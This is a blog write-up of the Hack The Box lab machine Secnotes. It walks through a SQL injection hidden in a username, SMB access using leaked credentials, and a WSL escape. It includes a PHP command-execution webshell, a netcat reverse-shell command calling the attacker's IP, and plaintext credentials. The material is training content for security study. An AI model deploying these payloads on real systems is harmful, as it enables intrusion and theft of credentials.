Image for post
Image for post

Secnotes Write-up (HTB)

George O
George O
Jan 20, 2019 · 6 min read

This is a write-up for the recently retired Secnotes machine on the Hack The Box platform. If you don’t already know, Hack The Box is a website where you can further your cybersecurity knowledge by hacking into a range of different machines.

TL;DR: SQLi & WSL Escape | I did this box a few months ago, so the commentary on it may be a little rusty. It’s clear that it was popular, since it wasn’t voted out for so long. The main attack vectors in this were SQL Injection through the login field, and then escaping through cleartext passwords in the Windows Subsystem for Linux.

PART ONE: USER

Image for post
Image for post
nmap -sV -sC -oN nmap.log 10.10.10.97

It seems like there are only two services running on this box: HTTP & SMB. We can also see that the webserver is running Microsoft IIS, which is definitely important to note.

Visiting the website shows a login screen, with the option to create an account:

Image for post
Image for post

I initially tried some simple logins (such as admin/admin or admin/password) but didn’t get anywhere. So, I decided to create an account with the details user123/password123 and see what’s inside. The basic functionality of the website is as follows:

Image for post
Image for post

There are a few important functions to take from this:

  • We can create/delete notes
  • We can change our own password
  • We can contact the owner

My first discovery on here was that we could perform XSS on any of the fields:

Image for post
Image for post

Since we have an option to send forms to the owner, I tried forming a cookie-stealing XSS that would steal an administrator’s cookie, however after leaving it for a while, I never received a call back.

I then tried to do some SQLi on the PHPSESSID cookie, and some SQLi on the initial login, but got nowhere through this. Since I’d hit a dead end, I gave up for that evening.

When I came back to the box, I decided to try a method that I had seen whilst reading through a write-up of an older box, Nightmare. In this, SQLi was achieved through creating an account with a username in which the SQL injection took place.

Let’s give this a go by creating an account with the username user’ OR 1=1#:

Image for post
Image for post

With this now created, we can log in and view all the notes!

Image for post
Image for post

Whilst Mimi’s Sticky Buns and TestNote were useless, the other two were interesting:

Image for post
Image for post

It looks like we’ve found some SMB credentials! We can now connect to the server like so:

george@kali:~/htb/secnotes$ smbclient -U tyler \\\\10.10.10.97\\new-siteEnter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&Try "help" to get a list of possible commands.smb: \> pwdCurrent directory is \\10.10.10.97\new-site\smb: \> ls.                                   D        0  Sat Sep  8 18:59:16 2018..                                  D        0  Sat Sep  8 18:59:16 2018iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018iisstart.php                        A       78  Sat Sep  8 18:57:36 2018iisstart.png                        A    98757  Thu Jun 21 11:26:03 201812978687 blocks of size 4096. 7860782 blocks availablesmb: \>

This is strange — we have some IIS files that we haven’t come across yet. After attempting some further enumeration on this service, I decided to rescan the system to see if our initial nmap scan had missed anything:

Image for post
Image for post
nmap -p- -T5 10.10.10.97

Here, we can wee a port that didn’t appear before: 8808. Attempting to connect to this port reveals that it’s running as a website:

Image for post
Image for post

As such, let’s visit this in the browser:

Image for post
Image for post

Since we’ve now found the default IIS page (iisstart.htm), we can assume that the SMB server serves the pages for this site. We can test this theory by uploading a simple “test.html” webpage:

Image for post
Image for post

From here it’s trivial to upload a PHP reverse shell and therefore perform RCE. I used this really short script as my webshell:

<form action="rce.php" method="get"><input type="text" name="cmd"><input type="submit"><?php    if(isset($_REQUEST['cmd'])){    echo "<pre>";    $cmd = ($_REQUEST['cmd']);    system($cmd);    echo "</pre>";    die;}?>

With this uploaded, we can now run commands:

Image for post
Image for post

Since we have read access, we can go ahead and read the user flag:

Image for post
Image for post

PART TWO: ROOT

nc64.exe -e cmd.exe 10.10.14.214 4444

…into the webshell, and waited to catch it with netcat:

Image for post
Image for post

With a proper shell now in place, we can begin enumerating. Before long, I found a strange folder in the C:\ directory:

C:\>dirVolume in drive C has no label.Volume Serial Number is 9CDD-BADADirectory of C:\06/21/2018  03:07 PM    <DIR>          Distros06/21/2018  06:47 PM    <DIR>          inetpub06/22/2018  02:09 PM    <DIR>          Microsoft04/11/2018  04:38 PM    <DIR>          PerfLogs06/21/2018  08:15 AM    <DIR>          php708/19/2018  02:56 PM    <DIR>          Program Files06/21/2018  06:47 PM    <DIR>          Program Files (x86)06/21/2018  03:07 PM       201,749,452 Ubuntu.zip06/21/2018  03:00 PM    <DIR>          Users08/19/2018  11:15 AM    <DIR>          Windows09/09/2018  03:25 AM                 0 __output2 File(s)    201,749,452 bytes9 Dir(s)  32,515,137,536 bytes freeC:\>

It’s strange that we’d have a distros folder in a Windows machine, so it seems like this may be what we’re looking for. In the distros folder, there was one other folder: Ubuntu.

C:\Distros\Ubuntu>dirVolume in drive C has no label.Volume Serial Number is 9CDD-BADADirectory of C:\Distros\Ubuntu09/09/2018  02:53 AM    <DIR>          .09/09/2018  02:53 AM    <DIR>          ..07/11/2017  06:10 PM           190,434 AppxBlockMap.xml07/11/2017  06:10 PM             2,475 AppxManifest.xml06/21/2018  03:07 PM    <DIR>          AppxMetadata07/11/2017  06:11 PM            10,554 AppxSignature.p7x06/21/2018  03:07 PM    <DIR>          Assets06/21/2018  03:07 PM    <DIR>          images07/11/2017  06:10 PM       201,254,783 install.tar.gz07/11/2017  06:10 PM             4,840 resources.pri06/21/2018  05:51 PM    <DIR>          temp07/11/2017  06:10 PM           222,208 ubuntu.exe07/11/2017  06:10 PM               809 [Content_Types].xml7 File(s)    201,686,103 bytes6 Dir(s)  32,515,235,840 bytes freeC:\Distros\Ubuntu>

Launching ubuntu.exe just makes the shell hang, and eventually die. I did some research on this folder for a while, and found out that this is part of the WSL (Windows Subsystem for Linux). Since we’re trying to look for ways to get into this, I searched for some other ESL-related files:

Directory of C:\Windows\System32: 114,688 wsl.exeDirectory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf: 114,688 wsl.exeDirectory of C:\Windows\System32: 115,712 bash.exeDirectory of C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5: 115,712 bash.exeDirectory of C:\Distros\Ubuntu: 222,208 ubuntu.exe

I then ran the wsl.exe file, which gave us a shell (the python command simply upgrades us to a TTY shell):

Image for post
Image for post

As part of the usual Linux enumeration, I checked the .bash_history file and found the following:

Image for post
Image for post

The administrator SMB credentials are there! Let’s copy this command into our own terminal:

Image for post
Image for post

And with that, the box is complete!

CTF Writeups

A collection of write-ups for various systems.

Medium is an open platform where 170 million readers come to find insightful and dynamic thinking. Here, expert and undiscovered voices alike dive into the heart of any topic and bring new ideas to the surface. Learn more

Follow the writers, publications, and topics that matter to you, and you’ll see them on your homepage and in your inbox. Explore

If you have a story to tell, knowledge to share, or a perspective to offer — welcome home. It’s easy and free to post your thinking on any topic. Write on Medium

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store